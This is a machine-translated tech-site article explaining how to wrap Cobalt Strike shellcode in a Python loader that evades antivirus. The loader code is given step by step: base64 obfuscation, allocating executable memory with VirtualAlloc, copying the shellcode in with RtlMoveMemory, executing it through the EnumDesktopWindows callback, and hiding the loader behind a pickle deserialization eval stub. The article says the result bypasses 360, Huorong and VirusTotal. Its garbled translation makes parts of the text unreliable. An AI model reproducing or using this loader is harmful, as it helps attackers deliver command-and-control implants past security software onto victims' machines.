Shulou(Shulou.com)06/01 Report--

For this question, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and easy way. Python how to deal with the shellcode generated by cs can simply bypass the kill-free problem.

How to simply bypass the kill-free by dealing with the shellcode generated by cs.

The code is as follows

Take out shellcode content

First deal with the payload.py generated by cs to extract the relevant shellcode code

Shellcode = open ('payload.py') shellcode = shellcode.read () # take out shellcode content S1 = shellcode.find ("\") + 1s2 = shellcode.rfind ("\") shellcode = Shellcode [S1: S2] base64 encryption

Confusing shellcode with base64 encryption

Shellcode = str (base64.b64encode (shellcode.encode ('UTF-8')),' UTF-8') construct shellcode loader

Decrypt shellcode with base64

Shellcode = base64.b64decode (shellcode) shellcode = codecs.escape_decode (shellcode) [0] shellcode = bytearray (shellcode)

Set VirtualAlloc return type to ctypes.c_unit64

Ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

Call the VirtualAlloc function to request a dynamic memory area

The prototype and parameters of the VirtualAlloc function are as follows: LPVOID VirtualAlloc {LPVOID lpAddress, # address of the memory area to be allocated DWORD dwSize, # allocated size DWORD flAllocationType, # allocated type DWORD flProtect # initial protection attribute of the memory}; ptr = ctypes.windll.kernel32.VirtualAlloc (ctypes.c_int (0), ctypes.c_int (len (shellcode)), ctypes.c_int (0x3000), ctypes.c_int (0x40))

Load shellcode into memory

Copy the contents from the specified memory address to the memory we applied for, and copy as many shellcode bytes as possible.

Buf = (ctypes.c_char * len (shellcode)) .from_buffer (shellcode) ctypes.windll.kernel32.RtlMoveMemory (ctypes.c_uint64 (ptr), buf, ctypes.c_int (len (shellcode)

Callback function is injected into shellcode

A callback function is a function passed as an argument

Mechanism

⑴ defines a callback function

⑵ provides the side of the function implementation to register the function pointer of the callback function with the caller during initialization.

⑶ when a specific event or condition occurs, the caller uses the function pointer to call the callback function to handle the event.

When we pass a function pointer to an argument that needs a callback function, once the function pointer is used to call the function, it points to the callback being executed. This can be abused to inject shellcode instead of function pointers.

There are many callback functions available under windows. EnumDesktopWindows is used in this article.

EnumDesktopWindows enumerates all the top-level windows associated with the specified desktop and then passes each window handle to the application-defined callback function.

BOOL EnumDesktopWindows (HDESK hDesktop, WNDENUMPROC lpfn, LPARAM lParam); the parameter hDesktop enumerates the handle to the desktop of the top-level window. The handle is returned by the CreateDesktop, GetThreadDesktop,OpenDesktop, or OpenInputDesktop function and must have DESKTOP_READOBJECTS access. If this parameter is NULL, the current desktop is used. The lpfn is a pointer to the application-defined EnumWindowsProc callback function. The value customized by the lParam application is passed to the callback function.

The second argument is the pointer to the callback function, so that you can pass a location-independent shellcode.

Deserialization load

First serialize the loader, and then encrypt the serialized code with base64

Class A (object): def _ reduce__ (self): return (exec, (code,)) ret = pickle.dumps (A ()) ret_base64 = base64.b64encode (ret)

Finally, deserialize and load loader

Strinq=b'cGlja2xlLmxvYWRzKGJhc2U2NC5iNjRkZWNvZGUoY29kZSkp'eval (str (base64.b64decode (strinq), 'utf-8'))

Loader is executed through the magic method of _ _ reduce__

Def _ reduce__ (self): return (exec, (code,))

You can successfully bypass anti-soft and launch cs.

Generate exe through pyinstaller for testing

Velvet

360 antivirus

360 security guard

Vt investigation and killing

This is the answer to how python can simply bypass the kill-free question by dealing with the shellcode generated by cs. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.